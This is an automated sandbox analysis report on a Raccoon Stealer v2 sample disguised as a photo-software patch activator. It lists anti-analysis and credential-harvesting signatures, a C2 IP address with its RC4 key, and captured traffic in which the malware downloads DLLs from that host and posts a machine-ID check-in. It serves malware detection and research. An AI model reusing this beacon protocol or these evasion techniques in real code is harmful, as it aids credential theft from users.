Windows Analysis Report
KbqArOlW06.exe

Overview

General Information

Sample Name: KbqArOlW06.exe
Analysis ID: 679264
MD5: 005297e7c0d555822b5a6f31fcdc7661
SHA1: 9d5f9d90a1574c333ec68dbc800cb70397a1826d
SHA256: 6b8dac8326076b76369a8eb4e316a86a7663b597aeffe89b35e86c02aa5df4c0
Tags: exeRecordBreaker

Detection

Raccoon Stealer v2
Score: 60
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic
Yara detected Raccoon Stealer v2
Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Query firmware table information (likely to detect VMs)
.NET source code contains potential unpacker
Tries to evade analysis by execution special instruction (VM detection)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
PE file contains section with special chars
Hides threads from debuggers
Obfuscated command line found
C2 URLs / IPs found in malware configuration
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
PE file contains strange resources
Drops PE files
Checks if the current process is being debugged
PE file contains more sections than normal
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Contains functionality to shutdown / reboot the system
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
Entry point lies outside standard sections
Is looking for software installed on the system
PE file does not import any functions
Sample file is different than original file name gathered from version info
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to launch a program with higher privileges
Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Classification

AV Detection

Source: KbqArOlW06.exe Virustotal: Detection: 26%
Source: KbqArOlW06.exe Metadefender: Detection: 28%
Source: KbqArOlW06.exe ReversingLabs: Detection: 69%
Source: KbqArOlW06.exe Avira: detected
Source: http://51.195.166.178/ Virustotal: Detection: 7%
Source: 0.3.KbqArOlW06.exe.18de6818.7.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 21.0.A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe.400000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen2
Source: 21.0.A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe.400000.1.unpack Avira: Label: TR/Crypt.XPACK.Gen2
Source: 21.2.A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe.400000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen2
Source: 21.0.A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe.400000.2.unpack Avira: Label: TR/Crypt.XPACK.Gen2
Source: 0.3.KbqArOlW06.exe.16726700.2.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.KbqArOlW06.exe.16636690.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.KbqArOlW06.exe.16866738.3.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.KbqArOlW06.exe.179e67e0.6.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.KbqArOlW06.exe.16ae6770.4.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.KbqArOlW06.exe.166866c8.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 21.0.A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe.400000.3.unpack Avira: Label: TR/Crypt.XPACK.Gen2
Source: 0.3.KbqArOlW06.exe.16fe67a8.5.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 00000000.00000003.249916384.0000000018DE6000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Raccoon {"C2 url": ["http://51.195.166.178/", "http://51.195.166.178/"], "Bot ID": "517bb0d640c1242c3f069aab3d1018d6", "RC4_key1": "517bb0d640c1242c3f069aab3d1018d6"}
Source: KbqArOlW06.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: freebl3.pdb source: freebl3.dll.16.dr
Source: Binary string: mozglue.pdb@+ source: 2.0.0-beta2.cps.exe, 00000010.00000002.511072689.000000006D833000.00000002.00000001.01000000.0000000F.sdmp, mozglue.dll.16.dr
Source: Binary string: nss3.pdb source: 2.0.0-beta2.cps.exe, 00000010.00000002.512735384.000000006D9EF000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: mozglue.pdb source: 2.0.0-beta2.cps.exe, 00000010.00000002.511072689.000000006D833000.00000002.00000001.01000000.0000000F.sdmp, mozglue.dll.16.dr
Source: Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.16.dr
Source: Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.16.dr
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00476F44 FindFirstFileA,FindNextFileA,FindClose, 22_2_00476F44
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0049AF28 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose, 22_2_0049AF28
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_004650D0 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 22_2_004650D0
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00453238 FindFirstFileA,GetLastError, 22_2_00453238
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0046554C SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 22_2_0046554C
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00463B44 FindFirstFileA,FindNextFileA,FindClose, 22_2_00463B44

Networking

Source: Traffic Snort IDS: 2036934 ET TROJAN Win32/RecordBreaker CnC Checkin 192.168.2.4:49778 -> 51.195.166.178:80
Source: Traffic Snort IDS: 2036955 ET TROJAN Win32/RecordBreaker CnC Checkin - Server Response 51.195.166.178:80 -> 192.168.2.4:49778
Source: Malware configuration extractor URLs: http://51.195.166.178/
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Fri, 05 Aug 2022 11:54:13 GMT Content-Type: application/octet-stream Content-Length: 2042296 Connection: keep-alive Last-Modified: Mon, 11 Apr 2022 14:39:48 GMT ETag: "62543db4-1f29b8" Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Fri, 05 Aug 2022 11:54:15 GMT Content-Type: application/octet-stream Content-Length: 449280 Connection: keep-alive Last-Modified: Mon, 11 Apr 2022 14:39:42 GMT ETag: "62543dae-6db00" Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Fri, 05 Aug 2022 11:54:17 GMT Content-Type: application/octet-stream Content-Length: 80128 Connection: keep-alive Last-Modified: Sat, 28 May 2022 16:52:46 GMT ETag: "6292535e-13900" Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Fri, 05 Aug 2022 11:54:18 GMT Content-Type: application/octet-stream Content-Length: 627128 Connection: keep-alive Last-Modified: Mon, 11 Apr 2022 14:39:36 GMT ETag: "62543da8-991b8" Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Fri, 05 Aug 2022 11:54:19 GMT Content-Type: application/octet-stream Content-Length: 684984 Connection: keep-alive Last-Modified: Mon, 11 Apr 2022 14:40:08 GMT ETag: "62543dc8-a73b8" Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Fri, 05 Aug 2022 11:54:20 GMT Content-Type: application/octet-stream Content-Length: 254392 Connection: keep-alive Last-Modified: Mon, 11 Apr 2022 14:39:58 GMT ETag: "62543dbe-3e1b8" Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Fri, 05 Aug 2022 11:54:23 GMT Content-Type: application/octet-stream Content-Length: 1099223 Connection: keep-alive Last-Modified: Mon, 11 Apr 2022 12:28:56 GMT ETag: "62541f08-10c5d7" Accept-Ranges: bytes
Source: Joe Sandbox View ASN Name: OVHFR OVHFR
Source: freebl3.dll.16.dr, mozglue.dll.16.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3.dll.16.dr, mozglue.dll.16.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3.dll.16.dr, mozglue.dll.16.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: freebl3.dll.16.dr, mozglue.dll.16.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3.dll.16.dr, mozglue.dll.16.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: freebl3.dll.16.dr, mozglue.dll.16.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3.dll.16.dr, mozglue.dll.16.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: freebl3.dll.16.dr, mozglue.dll.16.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3.dll.16.dr, mozglue.dll.16.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3.dll.16.dr, mozglue.dll.16.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: freebl3.dll.16.dr, mozglue.dll.16.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3.dll.16.dr, mozglue.dll.16.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3.dll.16.dr, mozglue.dll.16.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: freebl3.dll.16.dr, mozglue.dll.16.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp String found in binary or memory: http://www.innosetup.com/
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000000.459336953.0000000000401000.00000020.00000001.01000000.00000009.sdmp String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000000.459336953.0000000000401000.00000020.00000001.01000000.00000009.sdmp String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: 2.0.0-beta2.cps.exe, 00000010.00000002.511072689.000000006D833000.00000002.00000001.01000000.0000000F.sdmp, mozglue.dll.16.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000002.500341055.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.461402961.00000000023F0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.462132766.00000000021C4000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.503593390.0000000002257000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000003.470482188.000000000225C000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000003.469376595.00000000031B0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.palkornel.hu/innosetup
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000002.500341055.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.461402961.00000000023F0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.462132766.00000000021C4000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.503593390.0000000002257000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000003.470482188.000000000225C000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000003.469376595.00000000031B0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.palkornel.hu/innosetup%1
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.463131309.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.464570142.00000000023F0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp String found in binary or memory: http://www.remobjects.com/ps
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.463131309.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.464570142.00000000023F0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp String found in binary or memory: http://www.remobjects.com/psU
Source: 2.0.0-beta2.cps.exe, 00000010.00000002.510333215.0000000061ED1000.00000008.00000001.01000000.0000000E.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: freebl3.dll.16.dr, mozglue.dll.16.dr String found in binary or memory: https://mozilla.org0
Source: freebl3.dll.16.dr, mozglue.dll.16.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000002.500341055.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.461402961.00000000023F0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.462132766.00000000021C4000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.503593390.0000000002257000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.503570926.0000000002250000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000003.470482188.000000000225C000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000003.469376595.00000000031B0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.mediachance.com/
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.503570926.0000000002250000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.mediachance.com/&
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000002.500341055.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.462132766.00000000021C4000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000002.503593390.0000000002257000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp, 00000016.00000003.470482188.000000000225C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.mediachance.com/.
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000002.500341055.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe, 00000015.00000003.462132766.00000000021C4000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.mediachance.com/2
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll HTTP/1.1Content-Type: text/plain;User-Agent: recordHost: 51.195.166.178Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll HTTP/1.1Content-Type: text/plain;User-Agent: recordHost: 51.195.166.178Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll HTTP/1.1Content-Type: text/plain;User-Agent: recordHost: 51.195.166.178Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll HTTP/1.1Content-Type: text/plain;User-Agent: recordHost: 51.195.166.178Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll HTTP/1.1Content-Type: text/plain;User-Agent: recordHost: 51.195.166.178Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll HTTP/1.1Content-Type: text/plain;User-Agent: recordHost: 51.195.166.178Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll HTTP/1.1Content-Type: text/plain;User-Agent: recordHost: 51.195.166.178Connection: Keep-AliveCache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.166.178
Source: unknown HTTP traffic detected: POST / HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: mozzzzzzzzzzzHost: 51.195.166.178Content-Length: 94Connection: Keep-AliveCache-Control: no-cacheData Raw: 6d 61 63 68 69 6e 65 49 64 3d 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 7c 6a 6f 6e 65 73 26 63 6f 6e 66 69 67 49 64 3d 35 31 37 62 62 30 64 36 34 30 63 31 32 34 32 63 33 66 30 36 39 61 61 62 33 64 31 30 31 38 64 36 Data Ascii: machineId=d06ed635-68f6-4e9a-955c-4899f5f57b9a|user&configId=517bb0d640c1242c3f069aab3d1018d6

System Summary

Source: 2.0.0-beta2.cps.exe.0.dr Static PE information: section name: .a|D
Source: 2.0.0-beta2.cps.exe.0.dr Static PE information: section name: .=xC
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe Code function: 21_2_004088C0 21_2_004088C0
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00490830 22_2_00490830
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_004688B8 22_2_004688B8
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00482CD8 22_2_00482CD8
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00472090 22_2_00472090
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00452194 22_2_00452194
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0043E240 22_2_0043E240
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0043083C 22_2_0043083C
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0046A974 22_2_0046A974
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_004449B8 22_2_004449B8
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00434AB4 22_2_00434AB4
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00444F60 22_2_00444F60
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0048908C 22_2_0048908C
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_004313C8 22_2_004313C8
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00445658 22_2_00445658
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_004357B8 22_2_004357B8
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0045F954 22_2_0045F954
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00445A64 22_2_00445A64
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0045BA04 22_2_0045BA04
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00489FEC 22_2_00489FEC
Source: C:\Users\user\Desktop\KbqArOlW06.exe Process Stats: CPU usage > 98%
Source: 2.0.0-beta2.cps.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 2.0.0-beta2.cps.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp.21.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: sqlite3.dll.16.dr Static PE information: Number of sections : 18 > 10
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe Code function: 21_2_00409920 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 21_2_00409920
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00455E14 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 22_2_00455E14
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: String function: 00453B40 appears 97 times
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: String function: 0040909C appears 45 times
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: String function: 0040596C appears 114 times
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: String function: 004587AC appears 84 times
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: String function: 00403400 appears 62 times
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: String function: 004585A0 appears 124 times
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: String function: 00406F54 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: String function: 00403494 appears 84 times
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: String function: 00446594 appears 58 times
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: String function: 0040357C appears 34 times
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: String function: 004462C4 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: String function: 004349CC appears 32 times
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: String function: 00403684 appears 233 times
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: String function: 00407D84 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00424014 NtdllDefWindowProc_A, 22_2_00424014
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00412A68 NtdllDefWindowProc_A, 22_2_00412A68
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0047AC34 NtdllDefWindowProc_A, 22_2_0047AC34
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0042FA00 NtdllDefWindowProc_A, 22_2_0042FA00
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00457E24 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A, 22_2_00457E24
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0042EDC4: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError, 22_2_0042EDC4
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp.21.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp.21.dr Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp.21.dr Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
Source: KbqArOlW06.exe Static PE information: No import functions for PE file found
Source: KbqArOlW06.exe, 00000000.00000002.469170712.0000000001122000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameA1Photo-&-Art-Enhancer_Search&Patch_Activation.exe vs KbqArOlW06.exe
Source: KbqArOlW06.exe, 00000000.00000002.472580658.0000000001B9B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs KbqArOlW06.exe
Source: KbqArOlW06.exe Binary or memory string: OriginalFilenameA1Photo-&-Art-Enhancer_Search&Patch_Activation.exe vs KbqArOlW06.exe
Source: KbqArOlW06.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
